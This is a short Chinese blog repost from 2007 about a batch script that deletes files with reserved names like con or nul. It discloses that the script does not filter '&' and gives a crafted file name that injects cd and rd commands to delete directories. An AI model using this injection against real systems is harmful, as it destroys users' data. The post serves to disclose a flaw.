迅速删除非法文件名代码的 0day

    [多云 November 13, 2007 11:17 | by ]
来源:FreeXploiT
allyesno:我们会遇到很多所谓非法的文件名
例如 .. con nul 等等
FlowerCode 给出了以下方法可以快速删除这些文件名
http://hi.baidu.com/flowercode/blog/item/3f68be02a7cfd10d4bfb519f.html
引用
两行代码搞定,迅速删除使用非法文件名的文件及文件夹 2007年06月04日 星期一 19:08

DEL /F /A /Q \?%1 RD /S /Q \?%1


保存为 .bat 或者 .cmd 文件即可。
以后遇到什么 runauto..,com1 之类的,只要将其从资源管理器拖动到此批处理文件上,黑窗口闪过,文件(夹)立即消失。
这个方法 很好用的 不过是有漏洞

没有过滤掉& 所以我们就可以执行代码啦 呵呵

有两个关键

1.cmd启动的文件夹环境为 C:\Documents and Settings\Administrator

2.rd删除目录要用逗号分离参数而不是空格:)

exp:allyesno&cd..&cd..&rd,你删除了我
Tags: , ,
Tools | Comments(0) | Trackbacks(0) | Reads(6377)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive